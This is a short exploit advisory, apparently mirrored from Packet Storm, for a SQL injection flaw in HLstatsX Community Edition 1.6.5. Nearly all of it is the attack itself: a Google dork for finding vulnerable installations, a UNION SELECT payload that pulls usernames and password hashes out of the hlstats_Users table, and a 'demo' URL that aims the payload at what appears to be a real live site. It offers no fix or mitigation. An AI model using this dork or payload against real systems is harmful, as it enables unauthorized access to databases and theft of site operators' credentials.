HLstatsX Community Edition 1.6.5 SQL Injection

2010-01-09T00:00:00
ID PACKETSTORM:84956
Type packetstorm
Reporter Babora
Modified 2010-01-09T00:00:00

Description

                                        
                                            `#############################################################  
# HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability  
  
# Plugin Home: http://www.hlxcommunity.com/  
  
# Author: Babora  
  
# Site: www.1923turk.com  
  
##############################################################  
  
  
Google Dork: "hlstats.php?mode="   
  
# Exploit: xxxxx.com/xxx/hlstats.php?mode=dailyawardinfo&award==[SQL-inj]  
  
  
# -99+union+select+1,2,concat(username,0x3a,password),4+from+hlstats_Users--&game=css  
  
  
  
# Demo: http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat(username,0x3a,password),4+from+hlstats_Users--&game=css  
  
  
##############################################################  
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO  
##############################################################  
  
  
`